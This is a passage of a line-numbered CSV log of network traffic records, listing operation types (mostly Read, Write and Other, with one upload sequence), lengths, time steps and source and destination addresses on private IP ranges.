665 | Read,60,55,192.168.2.201,192.168.2.101
666 |
667 | Other,62,55,192.168.2.201,192.168.2.101
668 | Other,60,55,172.16.0.199,192.168.2.101
669 |
670 | Read,133,55,172.16.0.199,192.168.2.101
671 | Read,60,55,192.168.2.201,192.168.2.101
672 |
673 | Other,61,55,172.16.0.199,192.168.2.101
674 | Other,60,55,192.168.2.201,192.168.2.101
675 |
676 | Read,133,55,172.16.0.199,192.168.2.101
677 | Read,60,55,192.168.2.201,192.168.2.101
678 |
679 | Other,61,55,172.16.0.199,192.168.2.101
680 | Other,59,55,192.168.2.201,192.168.2.101
681 |
682 | Read,133,55,172.16.0.199,192.168.2.101
683 | Read,58,55,192.168.2.201,192.168.2.101
684 |
685 | Other,62,55,192.168.2.201,192.168.2.101
686 | Other,60,55,172.16.0.199,192.168.2.101
687 |
688 | Read,61,55,192.168.2.201,192.168.2.101
689 | Read,132,55,172.16.0.199,192.168.2.101
690 |
691 | Other,62,55,192.168.2.201,192.168.2.101
692 | Other,60,55,172.16.0.199,192.168.2.101
693 |
694 | Read,133,55,172.16.0.199,192.168.2.101
695 | Read,60,55,192.168.2.201,192.168.2.101
696 |
697 | Other,63,55,192.168.2.101,192.168.2.201
698 | Other,60,55,172.16.0.199,192.168.2.101
699 |
700 | Read,133,55,172.16.0.199,192.168.2.101
701 | Read,60,55,192.168.2.201,192.168.2.101
702 |
703 | Other,61,55,172.16.0.199,192.168.2.101
704 | Other,63,55,192.168.2.201,192.168.2.101
705 | Other,4,55,172.16.0.200,192.168.2.101
706 |
707 | Read,133,55,172.16.0.199,192.168.2.101
708 | Read,60,55,192.168.2.201,192.168.2.101
709 |
710 | Other,61,55,172.16.0.199,192.168.2.101
711 | Other,6,55,172.16.0.200,192.168.2.101
712 | Other,60,55,192.168.2.201,192.168.2.101
713 |
714 | Read,133,55,172.16.0.199,192.168.2.101
715 | Read,58,55,192.168.2.201,192.168.2.101
716 |
717 | Other,61,55,192.168.2.101,192.168.2.201
718 | Other,60,55,172.16.0.199,192.168.2.101
719 |
720 | Read,27,55,192.168.2.201,192.168.2.101
721 | Read,132,55,172.16.0.199,192.168.2.101
722 |
723 | Other,37,55,192.168.2.101,192.168.2.201
724 | Other,60,55,172.16.0.199,192.168.2.101
725 | Other,10,55,172.16.0.200,192.168.2.101
726 |
727 | Read,133,60,172.16.0.199,192.168.2.101
728 | Read,40,60,192.168.2.201,192.168.2.101
729 |
730 | Other,61,60,172.16.0.199,192.168.2.101
731 | Other,41,60,192.168.2.201,192.168.2.101
732 |
733 | Read,133,60,172.16.0.199,192.168.2.101
734 | Read,60,60,192.168.2.201,192.168.2.101
735 |
736 | Other,61,60,172.16.0.199,192.168.2.101
737 | Other,61,60,192.168.2.201,192.168.2.101
738 |
739 | Read,133,60,172.16.0.199,192.168.2.101
740 | Read,58,60,192.168.2.201,192.168.2.101
741 |
742 | Other,61,60,172.16.0.199,192.168.2.101
743 | Other,61,60,192.168.2.201,192.168.2.101
744 |
745 | Read,61,60,192.168.2.201,192.168.2.101
746 | Read,132,60,172.16.0.199,192.168.2.101
747 |
748 | Other,62,60,192.168.2.201,192.168.2.101
749 | Other,60,60,172.16.0.199,192.168.2.101
750 |
751 | Read,134,0,172.16.0.199,192.168.2.101
752 | Read,60,0,192.168.2.201,192.168.2.101
753 |
754 | Other,63,0,192.168.2.201,192.168.2.101
755 | Other,60,0,172.16.0.199,192.168.2.101
756 |
757 | Read,74,0,192.168.2.101,172.16.0.199
758 | Read,60,0,192.168.2.201,192.168.2.101
759 |
760 | Other,40,0,172.16.0.199,192.168.2.101
761 | Other,61,0,192.168.2.201,192.168.2.101
762 |
763 | Read,61,0,192.168.2.201,192.168.2.101
764 | Read,94,0,172.16.0.199,192.168.2.101
765 |
766 | Other,64,0,192.168.2.201,192.168.2.101
767 | Other,67,0,172.16.0.199,192.168.2.101
768 |
769 | Read,133,0,172.16.0.199,192.168.2.101
770 | Read,60,0,192.168.2.201,192.168.2.101
771 |
772 | Other,76,0,172.16.0.199,192.168.2.101
773 | Other,63,0,192.168.2.201,192.168.2.101
774 | Other,10,0,172.16.0.200,192.168.2.101
775 |
776 | Read,133,0,172.16.0.199,192.168.2.101
777 | Read,58,0,192.168.2.201,192.168.2.101
778 |
779 | Other,76,0,172.16.0.199,192.168.2.101
780 | Other,61,0,192.168.2.201,192.168.2.101
781 |
782 | Read,133,0,172.16.0.199,192.168.2.101
783 | Read,60,0,192.168.2.201,192.168.2.101
784 |
785 | Other,62,0,192.168.2.201,192.168.2.101
786 | Other,69,0,172.16.0.199,192.168.2.101
787 | Other,10,0,172.16.0.200,192.168.2.101
788 |
789 | Read,133,5,172.16.0.199,192.168.2.101
790 | Read,60,5,192.168.2.201,192.168.2.101
791 |
792 | Other,63,5,172.16.0.199,192.168.2.101
793 | Other,63,5,192.168.2.201,192.168.2.101
794 |
795 | Read,133,5,172.16.0.199,192.168.2.101
796 | Read,60,5,192.168.2.201,192.168.2.101
797 |
798 | Other,61,5,172.16.0.199,192.168.2.101
799 | Other,61,5,192.168.2.201,192.168.2.101
800 |
801 | Read,133,5,172.16.0.199,192.168.2.101
802 | Read,58,5,192.168.2.201,192.168.2.101
803 |
804 | Other,61,5,172.16.0.199,192.168.2.101
805 | Other,60,5,192.168.2.201,192.168.2.101
806 |
807 | Read,133,5,172.16.0.199,192.168.2.101
808 | Read,60,5,192.168.2.201,192.168.2.101
809 |
810 | Other,62,5,192.168.2.201,192.168.2.101
811 | Other,60,5,172.16.0.199,192.168.2.101
812 |
813 | Read,133,5,172.16.0.199,192.168.2.101
814 | Read,60,5,192.168.2.201,192.168.2.101
815 |
816 | Other,63,5,192.168.2.101,192.168.2.201
817 | Other,60,5,172.16.0.199,192.168.2.101
818 |
819 | Read,133,5,172.16.0.199,192.168.2.101
820 | Read,60,5,192.168.2.201,192.168.2.101
821 |
822 | Other,61,5,172.16.0.199,192.168.2.101
823 | Other,62,5,192.168.2.101,192.168.2.201
824 |
825 | Read,135,5,192.168.2.101,172.16.0.199
826 | Read,60,5,192.168.2.201,192.168.2.101
827 |
828 | Other,61,5,172.16.0.199,192.168.2.101
829 | Other,61,5,192.168.2.201,192.168.2.101
830 |
831 | Read,132,5,172.16.0.199,192.168.2.101
832 | Read,60,5,192.168.2.201,192.168.2.101
833 |
834 | Other,61,5,172.16.0.199,192.168.2.101
835 | Other,60,5,192.168.2.201,192.168.2.101
836 | Other,10,5,172.16.0.200,192.168.2.101
837 |
838 | Read,133,5,192.168.2.101,172.16.0.199
839 | Read,58,5,192.168.2.201,192.168.2.101
840 |
841 | Other,60,5,192.168.2.101,192.168.2.201
842 | Other,60,5,172.16.0.199,192.168.2.101
843 |
844 | Read,134,5,192.168.2.101,172.16.0.199
845 | Read,60,5,192.168.2.201,192.168.2.101
846 |
847 | Other,62,5,192.168.2.201,192.168.2.101
848 | Other,60,5,172.16.0.199,192.168.2.101
849 | Other,10,5,172.16.0.200,192.168.2.101
850 |
851 | Read,61,10,192.168.2.201,192.168.2.101
852 | Read,132,10,172.16.0.199,192.168.2.101
853 |
854 | Other,61,10,172.16.0.199,192.168.2.101
855 | Other,61,10,192.168.2.201,192.168.2.101
856 |
857 | Read,133,10,172.16.0.199,192.168.2.101
858 | Read,60,10,192.168.2.201,192.168.2.101
859 |
860 | Other,61,10,172.16.0.199,192.168.2.101
861 | Other,62,10,192.168.2.201,192.168.2.101
862 |
863 | Read,133,10,172.16.0.199,192.168.2.101
864 | Read,58,10,192.168.2.201,192.168.2.101
865 |
866 | Other,61,10,172.16.0.199,192.168.2.101
867 | Other,58,10,192.168.2.201,192.168.2.101
868 |
869 | Read,61,10,192.168.2.201,192.168.2.101
870 | Read,132,10,172.16.0.199,192.168.2.101
871 |
872 | Other,64,10,192.168.2.201,192.168.2.101
873 | Other,60,10,172.16.0.199,192.168.2.101
874 |
875 | Read,133,10,192.168.2.101,172.16.0.199
876 | Read,59,10,192.168.2.201,192.168.2.101
877 |
878 | Other,61,10,172.16.0.199,192.168.2.101
879 | Other,61,10,192.168.2.201,192.168.2.101
880 |
881 | Read,60,10,192.168.2.101,192.168.2.201
882 | Read,132,10,172.16.0.199,192.168.2.101
883 |
884 | Other,62,10,192.168.2.201,192.168.2.101
885 | Other,60,10,172.16.0.199,192.168.2.101
886 |
887 | Read,133,10,172.16.0.199,192.168.2.101
888 | Read,60,10,192.168.2.201,192.168.2.101
889 |
890 | Other,61,10,172.16.0.199,192.168.2.101
891 | Other,61,10,192.168.2.201,192.168.2.101
892 |
893 | Read,133,10,172.16.0.199,192.168.2.101
894 | Read,58,10,192.168.2.201,192.168.2.101
895 | Write,3,10,192.168.2.201,192.168.2.101
896 |
897 | Other,61,10,172.16.0.199,192.168.2.101
898 | Other,61,10,192.168.2.201,192.168.2.101
899 | Other,10,10,172.16.0.200,192.168.2.101
900 |
901 | Read,61,10,192.168.2.201,192.168.2.101
902 | Read,132,10,172.16.0.199,192.168.2.101
903 | Write,3,10,192.168.2.201,192.168.2.101
904 |
905 | Other,61,10,172.16.0.199,192.168.2.101
906 | Other,64,10,192.168.2.101,192.168.2.201
907 | Other,2,10,172.16.0.200,192.168.2.101
908 |
909 | Read,133,10,192.168.2.101,172.16.0.199
910 | Read,60,10,192.168.2.201,192.168.2.101
911 |
912 | Other,61,10,172.16.0.199,192.168.2.101
913 | Other,61,10,192.168.2.201,192.168.2.101
914 | Other,8,10,172.16.0.200,192.168.2.101
915 |
916 | Read,133,15,172.16.0.199,192.168.2.101
917 | Read,60,15,192.168.2.201,192.168.2.101
918 | Write,5,15,192.168.2.201,192.168.2.101
919 |
920 | Other,61,15,172.16.0.199,192.168.2.101
921 | Other,64,15,192.168.2.201,192.168.2.101
922 |
923 | Read,133,15,172.16.0.199,192.168.2.101
924 | Read,60,15,192.168.2.201,192.168.2.101
925 |
926 | Other,61,15,172.16.0.199,192.168.2.101
927 | Other,61,15,192.168.2.201,192.168.2.101
928 |
929 | Read,133,15,172.16.0.199,192.168.2.101
930 | Read,58,15,192.168.2.201,192.168.2.101
931 |
932 | Other,62,15,192.168.2.101,192.168.2.201
933 | Other,60,15,172.16.0.199,192.168.2.101
934 |
935 | Read,61,15,192.168.2.201,192.168.2.101
936 | Read,132,15,172.16.0.199,192.168.2.101
937 |
938 | Other,61,15,172.16.0.199,192.168.2.101
939 | Other,62,15,192.168.2.201,192.168.2.101
940 |
941 | Read,35,15,192.168.2.201,192.168.2.101
942 | Read,132,15,172.16.0.199,192.168.2.101
943 |
944 | Other,61,15,172.16.0.199,192.168.2.101
945 | Other,41,15,192.168.2.201,192.168.2.101
946 |
947 | Read,133,15,192.168.2.101,172.16.0.199
948 | Read,60,15,192.168.2.201,192.168.2.101
949 | Write,17,15,192.168.2.201,192.168.2.101
950 |
951 | Other,61,15,172.16.0.199,192.168.2.101
952 | Other,76,15,192.168.2.201,192.168.2.101
953 |
954 | Read,133,15,172.16.0.199,192.168.2.101
955 | Read,58,15,192.168.2.201,192.168.2.101
956 | Write,19,15,192.168.2.201,192.168.2.101
957 |
958 | Other,61,15,172.16.0.199,192.168.2.101
959 | Other,76,15,192.168.2.201,192.168.2.101
960 |
961 | Read,61,15,192.168.2.201,192.168.2.101
962 | Read,132,15,172.16.0.199,192.168.2.101
963 | Write,33,15,192.168.2.201,192.168.2.101
964 |
965 | Other,61,15,172.16.0.199,192.168.2.101
966 | Other,94,15,192.168.2.201,192.168.2.101
967 | Other,10,15,172.16.0.200,192.168.2.101
968 |
969 | Read,61,15,192.168.2.201,192.168.2.101
970 | Read,132,15,172.16.0.199,192.168.2.101
971 | Write,37,15,192.168.2.201,192.168.2.101
972 |
973 | Other,61,15,172.16.0.199,192.168.2.101
974 | Other,96,15,192.168.2.201,192.168.2.101
975 | Other,4,15,172.16.0.200,192.168.2.101
976 |
977 | Read,133,15,172.16.0.199,192.168.2.101
978 | Read,60,15,192.168.2.201,192.168.2.101
979 |
980 | Other,61,15,172.16.0.199,192.168.2.101
981 | Other,62,15,192.168.2.101,192.168.2.201
982 | Other,6,15,172.16.0.200,192.168.2.101
983 |
984 | Read,133,20,172.16.0.199,192.168.2.101
985 | Read,60,20,192.168.2.201,192.168.2.101
986 |
987 | Other,61,20,172.16.0.199,192.168.2.101
988 | Other,61,20,192.168.2.201,192.168.2.101
989 |
990 | Read,133,20,172.16.0.199,192.168.2.101
991 | Read,58,20,192.168.2.201,192.168.2.101
992 |
993 | Other,61,20,172.16.0.199,192.168.2.101
994 | Other,60,20,192.168.2.201,192.168.2.101
995 |
996 | Read,61,20,192.168.2.201,192.168.2.101
997 | Read,132,20,172.16.0.199,192.168.2.101
998 |
999 | Other,62,20,172.16.0.199,192.168.2.101
1000 | Other,61,20,192.168.2.201,192.168.2.101
1001 |
1002 | Read,133,20,172.16.0.199,192.168.2.101
1003 | Read,60,20,192.168.2.201,192.168.2.101
1004 |
1005 | Other,61,20,172.16.0.199,192.168.2.101
1006 | Other,61,20,192.168.2.201,192.168.2.101
1007 |
1008 | Read,133,20,192.168.2.101,172.16.0.199
1009 | Read,60,20,192.168.2.201,192.168.2.101
1010 |
1011 | Other,61,20,172.16.0.199,192.168.2.101
1012 | Other,62,20,192.168.2.201,192.168.2.101
1013 |
1014 | Read,133,20,172.16.0.199,192.168.2.101
1015 | Read,60,20,192.168.2.201,192.168.2.101
1016 |
1017 | Other,61,20,172.16.0.199,192.168.2.101
1018 | Other,62,20,192.168.2.201,192.168.2.101
1019 |
1020 | Read,133,20,172.16.0.199,192.168.2.101
1021 | Read,58,20,192.168.2.201,192.168.2.101
1022 |
1023 | Other,62,20,172.16.0.199,192.168.2.101
1024 | Other,60,20,192.168.2.201,192.168.2.101
1025 |
1026 | Read,61,20,192.168.2.201,192.168.2.101
1027 | Read,132,20,172.16.0.199,192.168.2.101
1028 |
1029 | Other,63,20,172.16.0.199,192.168.2.101
1030 | Other,62,20,192.168.2.201,192.168.2.101
1031 | Other,10,20,172.16.0.200,192.168.2.101
1032 |
1033 | Read,133,20,172.16.0.199,192.168.2.101
1034 | Read,60,20,192.168.2.201,192.168.2.101
1035 |
1036 | Other,61,20,172.16.0.199,192.168.2.101
1037 | Other,62,20,192.168.2.201,192.168.2.101
1038 | Other,6,20,172.16.0.200,192.168.2.101
1039 |
1040 | Read,133,20,172.16.0.199,192.168.2.101
1041 | Read,60,20,192.168.2.201,192.168.2.101
1042 |
1043 | Other,62,20,172.16.0.199,192.168.2.101
1044 | Other,62,20,192.168.2.101,192.168.2.201
1045 | Other,4,20,172.16.0.200,192.168.2.101
1046 |
1047 | Read,133,25,172.16.0.199,192.168.2.101
1048 | Read,58,25,192.168.2.201,192.168.2.101
1049 |
1050 | Other,62,25,172.16.0.199,192.168.2.101
1051 | Other,59,25,192.168.2.201,192.168.2.101
1052 |
1053 | Read,41,25,192.168.2.201,192.168.2.101
1054 | Read,132,25,172.16.0.199,192.168.2.101
1055 |
1056 | Other,51,25,192.168.2.201,192.168.2.101
1057 | Other,62,25,172.16.0.199,192.168.2.101
1058 |
1059 | Read,61,25,192.168.2.201,192.168.2.101
1060 | Read,132,25,172.16.0.199,192.168.2.101
1061 |
1062 | Other,62,25,172.16.0.199,192.168.2.101
1063 | Other,62,25,192.168.2.201,192.168.2.101
1064 |
1065 | Read,133,25,172.16.0.199,192.168.2.101
1066 | Read,60,25,192.168.2.201,192.168.2.101
1067 |
1068 | Other,61,25,172.16.0.199,192.168.2.101
1069 | Other,61,25,192.168.2.201,192.168.2.101
1070 |
1071 | Read,133,25,172.16.0.199,192.168.2.101
1072 | Read,60,25,192.168.2.201,192.168.2.101
1073 | Write,33,25,192.168.2.201,192.168.2.101
1074 |
1075 | Other,62,25,172.16.0.199,192.168.2.101
1076 | Other,93,25,192.168.2.201,192.168.2.101
1077 |
1078 | Read,133,25,172.16.0.199,192.168.2.101
1079 | Read,58,25,192.168.2.201,192.168.2.101
1080 |
1081 | Other,61,25,172.16.0.199,192.168.2.101
1082 | Other,58,25,192.168.2.201,192.168.2.101
1083 |
1084 | Read,61,25,192.168.2.201,192.168.2.101
1085 | Read,132,25,172.16.0.199,192.168.2.101
1086 |
1087 | Other,62,25,172.16.0.199,192.168.2.101
1088 | Other,61,25,192.168.2.201,192.168.2.101
1089 |
1090 | Read,61,25,192.168.2.201,192.168.2.101
1091 | Read,132,25,172.16.0.199,192.168.2.101
1092 |
1093 | Other,64,25,192.168.2.201,192.168.2.101
1094 | Other,62,25,172.16.0.199,192.168.2.101
1095 | Other,10,25,172.16.0.200,192.168.2.101
1096 |
1097 | Read,133,25,172.16.0.199,192.168.2.101
1098 | Read,60,25,192.168.2.201,192.168.2.101
1099 |
1100 | Other,64,25,192.168.2.201,192.168.2.101
1101 | Other,64,25,172.16.0.199,192.168.2.101
1102 | Other,6,25,172.16.0.200,192.168.2.101
1103 |
1104 | Read,133,25,192.168.2.101,172.16.0.199
1105 | Read,60,25,192.168.2.201,192.168.2.101
1106 |
1107 | Other,77,25,172.16.0.199,192.168.2.101
1108 | Other,61,25,192.168.2.201,192.168.2.101
1109 | Other,4,25,172.16.0.200,192.168.2.101
1110 |
1111 | Read,133,30,172.16.0.199,192.168.2.101
1112 | Read,58,30,192.168.2.201,192.168.2.101
1113 |
1114 | Other,77,30,172.16.0.199,192.168.2.101
1115 | Other,62,30,192.168.2.101,192.168.2.201
1116 |
1117 | Read,61,30,192.168.2.201,192.168.2.101
1118 | Read,132,30,172.16.0.199,192.168.2.101
1119 |
1120 | Other,63,30,192.168.2.201,192.168.2.101
1121 | Other,80,30,172.16.0.199,192.168.2.101
1122 |
1123 | Read,61,30,192.168.2.201,192.168.2.101
1124 | Read,132,30,172.16.0.199,192.168.2.101
1125 |
1126 | Other,63,30,192.168.2.201,192.168.2.101
1127 | Other,77,30,172.16.0.199,192.168.2.101
1128 |
1129 | Read,133,30,172.16.0.199,192.168.2.101
1130 | Read,60,30,192.168.2.201,192.168.2.101
1131 |
1132 | Other,62,30,192.168.2.201,192.168.2.101
1133 | Other,76,30,172.16.0.199,192.168.2.101
1134 |
1135 | Read,133,30,172.16.0.199,192.168.2.101
1136 | Read,60,30,192.168.2.201,192.168.2.101
1137 |
1138 | Other,79,30,172.16.0.199,192.168.2.101
1139 | Other,61,30,192.168.2.101,192.168.2.201
1140 | Other,37,30,192.168.2.4,192.168.2.101
1141 |
1142 | Read,133,30,172.16.0.199,192.168.2.101
1143 | Read,60,30,192.168.2.201,192.168.2.101
1144 |
1145 | Other,75,30,172.16.0.199,192.168.2.101
1146 | Other,61,30,192.168.2.201,192.168.2.101
1147 |
1148 | Read,133,30,172.16.0.199,192.168.2.101
1149 | Read,58,30,192.168.2.201,192.168.2.101
1150 |
1151 | Other,77,30,172.16.0.199,192.168.2.101
1152 | Other,60,30,192.168.2.101,192.168.2.201
1153 |
1154 | Read,61,30,192.168.2.201,192.168.2.101
1155 | Read,132,30,172.16.0.199,192.168.2.101
1156 |
1157 | Other,62,30,192.168.2.201,192.168.2.101
1158 | Other,76,30,192.168.2.101,172.16.0.199
1159 | Other,8,30,172.16.0.200,192.168.2.101
1160 |
1161 | Read,133,30,172.16.0.199,192.168.2.101
1162 | Read,60,30,192.168.2.201,192.168.2.101
1163 |
1164 | Other,9,30,172.16.0.200,192.168.2.101
1165 | Other,74,30,192.168.2.101,172.16.0.199
1166 | Other,62,30,192.168.2.201,192.168.2.101
1167 |
1168 | Read,133,30,172.16.0.199,192.168.2.101
1169 | Read,60,30,192.168.2.201,192.168.2.101
1170 |
1171 | Other,74,30,192.168.2.101,172.16.0.199
1172 | Other,61,30,192.168.2.201,192.168.2.101
1173 | Other,4,30,172.16.0.200,192.168.2.101
1174 |
1175 | Read,133,35,172.16.0.199,192.168.2.101
1176 | Read,60,35,192.168.2.201,192.168.2.101
1177 |
1178 | Other,70,35,192.168.2.101,172.16.0.199
1179 | Other,61,35,192.168.2.101,192.168.2.201
1180 |
1181 | Read,133,35,172.16.0.199,192.168.2.101
1182 | Read,58,35,192.168.2.201,192.168.2.101
1183 |
1184 | Other,61,35,192.168.2.101,192.168.2.201
1185 | Other,62,35,172.16.0.199,192.168.2.101
1186 |
1187 | Read,61,35,192.168.2.201,192.168.2.101
1188 | Read,132,35,172.16.0.199,192.168.2.101
1189 |
1190 | Other,62,35,192.168.2.201,192.168.2.101
1191 | Other,60,35,172.16.0.199,192.168.2.101
1192 |
1193 | Read,133,35,172.16.0.199,192.168.2.101
1194 | Read,60,35,192.168.2.201,192.168.2.101
1195 |
1196 | Other,62,35,192.168.2.201,192.168.2.101
1197 | Other,60,35,172.16.0.199,192.168.2.101
1198 |
1199 | Read,133,35,172.16.0.199,192.168.2.101
1200 | Read,60,35,192.168.2.201,192.168.2.101
1201 |
1202 | Other,61,35,172.16.0.199,192.168.2.101
1203 | Other,61,35,192.168.2.201,192.168.2.101
1204 |
1205 | Read,133,35,172.16.0.199,192.168.2.101
1206 | Read,60,35,192.168.2.201,192.168.2.101
1207 |
1208 | Other,61,35,172.16.0.199,192.168.2.101
1209 | Other,61,35,192.168.2.201,192.168.2.101
1210 |
1211 | Read,133,35,172.16.0.199,192.168.2.101
1212 | Read,58,35,192.168.2.201,192.168.2.101
1213 |
1214 | Other,61,35,192.168.2.101,192.168.2.201
1215 | Other,60,35,172.16.0.199,192.168.2.101
1216 |
1217 | Read,61,35,192.168.2.201,192.168.2.101
1218 | Read,132,35,172.16.0.199,192.168.2.101
1219 |
1220 | Other,62,35,192.168.2.201,192.168.2.101
1221 | Other,60,35,172.16.0.199,192.168.2.101
1222 |
1223 | Read,133,35,172.16.0.199,192.168.2.101
1224 | Read,60,35,192.168.2.201,192.168.2.101
1225 |
1226 | Other,17,35,172.16.0.200,192.168.2.101
1227 | Other,61,35,192.168.2.201,192.168.2.101
1228 | Other,60,35,172.16.0.199,192.168.2.101
1229 |
1230 | Read,133,35,172.16.0.199,192.168.2.101
1231 | Read,60,35,192.168.2.201,192.168.2.101
1232 |
1233 | Other,61,35,172.16.0.199,192.168.2.101
1234 | Other,61,35,192.168.2.201,192.168.2.101
1235 | Other,4,35,172.16.0.200,192.168.2.101
1236 |
1237 | Read,133,40,172.16.0.199,192.168.2.101
1238 | Read,60,40,192.168.2.201,192.168.2.101
1239 |
1240 | Other,61,40,172.16.0.199,192.168.2.101
1241 | Other,60,40,192.168.2.201,192.168.2.101
1242 |
1243 | Read,133,40,172.16.0.199,192.168.2.101
1244 | Read,58,40,192.168.2.201,192.168.2.101
1245 |
1246 | Other,61,40,172.16.0.199,192.168.2.101
1247 | Other,59,40,192.168.2.201,192.168.2.101
1248 |
1249 | Read,61,40,192.168.2.201,192.168.2.101
1250 | Read,132,40,172.16.0.199,192.168.2.101
1251 |
1252 | Other,63,40,192.168.2.201,192.168.2.101
1253 | Other,60,40,172.16.0.199,192.168.2.101
1254 |
1255 | Read,133,40,172.16.0.199,192.168.2.101
1256 | Read,60,40,192.168.2.201,192.168.2.101
1257 |
1258 | Other,61,40,192.168.2.201,192.168.2.101
1259 | Other,60,40,172.16.0.199,192.168.2.101
1260 |
1261 | Read,133,40,172.16.0.199,192.168.2.101
1262 | Read,60,40,192.168.2.201,192.168.2.101
1263 |
1264 | Other,61,40,172.16.0.199,192.168.2.101
1265 | Other,60,40,192.168.2.201,192.168.2.101
1266 |
1267 | Read,133,40,172.16.0.199,192.168.2.101
1268 | Read,60,40,192.168.2.201,192.168.2.101
1269 | StartUpload,74,40,192.168.2.4,192.168.2.101
1270 | Upload,113,40,192.168.2.4,192.168.2.101
1271 | EndUpload,73,40,192.168.2.4,192.168.2.101
1272 |
1273 | Other,61,40,172.16.0.199,192.168.2.101
1274 | Other,62,40,192.168.2.201,192.168.2.101
1275 | Other,309,40,192.168.2.4,192.168.2.101
1276 |
1277 | Read,133,40,172.16.0.199,192.168.2.101
1278 | Read,58,40,192.168.2.201,192.168.2.101
1279 |
1280 | Other,61,40,172.16.0.199,192.168.2.101
1281 | Other,58,40,192.168.2.201,192.168.2.101
1282 |
1283 | Read,61,40,192.168.2.201,192.168.2.101
1284 | Read,132,40,172.16.0.199,192.168.2.101
1285 |
1286 | Other,63,40,192.168.2.201,192.168.2.101
1287 | Other,60,40,172.16.0.199,192.168.2.101
1288 |
1289 | Read,133,40,172.16.0.199,192.168.2.101
1290 | Read,60,40,192.168.2.201,192.168.2.101
1291 |
1292 | Other,61,40,192.168.2.201,192.168.2.101
1293 | Other,60,40,172.16.0.199,192.168.2.101
1294 | Other,16,40,172.16.0.200,192.168.2.101
1295 |
1296 | Read,133,40,192.168.2.101,172.16.0.199
1297 | Read,60,40,192.168.2.201,192.168.2.101
1298 |
1299 | Other,61,40,172.16.0.199,192.168.2.101
1300 | Other,61,40,192.168.2.201,192.168.2.101
1301 | Other,4,40,172.16.0.200,192.168.2.101
1302 |
1303 | Read,133,45,172.16.0.199,192.168.2.101
1304 | Read,60,45,192.168.2.201,192.168.2.101
1305 |
1306 | Other,61,45,172.16.0.199,192.168.2.101
1307 | Other,62,45,192.168.2.201,192.168.2.101
1308 |
1309 | Read,133,45,172.16.0.199,192.168.2.101
1310 | Read,58,45,192.168.2.201,192.168.2.101
1311 |
1312 | Other,61,45,172.16.0.199,192.168.2.101
1313 | Other,60,45,192.168.2.201,192.168.2.101
1314 |
1315 | Read,61,45,192.168.2.201,192.168.2.101
1316 | Read,132,45,172.16.0.199,192.168.2.101
1317 |
1318 | Other,63,45,192.168.2.201,192.168.2.101
1319 | Other,60,45,172.16.0.199,192.168.2.101
1320 |
1321 | Read,133,45,172.16.0.199,192.168.2.101
1322 | Read,60,45,192.168.2.201,192.168.2.101
1323 |
1324 | Other,63,45,192.168.2.201,192.168.2.101
1325 | Other,60,45,172.16.0.199,192.168.2.101
1326 |
1327 | Read,133,45,172.16.0.199,192.168.2.101
1328 | Read,60,45,192.168.2.201,192.168.2.101
1329 | Write,3,45,192.168.2.7,192.168.2.101
1330 |
1331 | Other,61,45,172.16.0.199,192.168.2.101
1332 | Other,61,45,192.168.2.201,192.168.2.101
1333 | Other,18,45,192.168.2.7,192.168.2.101
1334 |
1335 | Read,133,45,172.16.0.199,192.168.2.101
1336 | Read,60,45,192.168.2.201,192.168.2.101
1337 |
1338 | Other,61,45,172.16.0.199,192.168.2.101
1339 | Other,60,45,192.168.2.201,192.168.2.101
1340 |
1341 | Read,133,45,172.16.0.199,192.168.2.101
1342 | Read,60,45,192.168.2.201,192.168.2.101
1343 | Read,12,45,192.168.2.7,192.168.2.101
1344 | Write,4065,45,192.168.2.7,192.168.2.101
1345 |
1346 | Other,61,45,172.16.0.199,192.168.2.101
1347 | Other,63,45,192.168.2.201,192.168.2.101
1348 | Other,135,45,192.168.2.7,192.168.2.101
1349 |
1350 | Read,133,45,172.16.0.199,192.168.2.101
1351 | Read,58,45,192.168.2.201,192.168.2.101
1352 | Read,12,45,192.168.2.7,192.168.2.101
1353 | Write,3,45,192.168.2.7,192.168.2.101
1354 |
1355 | Other,61,45,172.16.0.199,192.168.2.101
1356 | Other,60,45,192.168.2.201,192.168.2.101
1357 | Other,28,45,192.168.2.7,192.168.2.101
1358 |
1359 | Read,133,45,172.16.0.199,192.168.2.101
1360 | Read,60,45,192.168.2.201,192.168.2.101
1361 |
1362 | Other,62,45,192.168.2.201,192.168.2.101
1363 | Other,60,45,172.16.0.199,192.168.2.101
1364 | Other,16,45,172.16.0.200,192.168.2.101
1365 |
1366 | Read,133,45,172.16.0.199,192.168.2.101
1367 | Read,60,45,192.168.2.201,192.168.2.101
1368 | Write,31,45,192.168.2.201,192.168.2.101
1369 |
1370 | Other,61,45,172.16.0.199,192.168.2.101
1371 | Other,91,45,192.168.2.201,192.168.2.101
1372 | Other,4,45,172.16.0.200,192.168.2.101
1373 |
1374 | Read,134,50,172.16.0.199,192.168.2.101
1375 | Read,60,50,192.168.2.201,192.168.2.101
1376 |
1377 | Other,61,50,172.16.0.199,192.168.2.101
1378 | Other,61,50,192.168.2.201,192.168.2.101
1379 |
1380 | Read,134,50,192.168.2.101,172.16.0.199
1381 | Read,60,50,192.168.2.201,192.168.2.101
1382 |
1383 | Other,61,50,172.16.0.199,192.168.2.101
1384 | Other,61,50,192.168.2.201,192.168.2.101
1385 |
1386 | Read,133,50,172.16.0.199,192.168.2.101
1387 | Read,58,50,192.168.2.201,192.168.2.101
1388 |
1389 | Other,61,50,172.16.0.199,192.168.2.101
1390 | Other,59,50,192.168.2.201,192.168.2.101
1391 |
1392 | Read,61,50,192.168.2.201,192.168.2.101
1393 | Read,132,50,172.16.0.199,192.168.2.101
1394 |
1395 | Other,63,50,192.168.2.201,192.168.2.101
1396 | Other,60,50,172.16.0.199,192.168.2.101
1397 |
1398 | Read,61,50,192.168.2.201,192.168.2.101
1399 | Read,132,50,172.16.0.199,192.168.2.101
1400 |
1401 | Other,61,50,172.16.0.199,192.168.2.101
1402 | Other,61,50,192.168.2.201,192.168.2.101
1403 |
1404 | Read,133,50,172.16.0.199,192.168.2.101
1405 | Read,60,50,192.168.2.201,192.168.2.101
1406 |
1407 | Other,64,50,172.16.0.199,192.168.2.101
1408 | Other,62,50,192.168.2.201,192.168.2.101
1409 |
1410 | Read,133,50,172.16.0.199,192.168.2.101
1411 | Read,60,50,192.168.2.201,192.168.2.101
1412 |
1413 | Other,61,50,172.16.0.199,192.168.2.101
1414 | Other,61,50,192.168.2.201,192.168.2.101
1415 |
1416 | Read,133,50,172.16.0.199,192.168.2.101
1417 | Read,58,50,192.168.2.201,192.168.2.101
1418 |
1419 | Other,64,50,172.16.0.199,192.168.2.101
1420 | Other,60,50,192.168.2.201,192.168.2.101
1421 |
1422 | Read,61,50,192.168.2.201,192.168.2.101
1423 | Read,132,50,172.16.0.199,192.168.2.101
1424 |
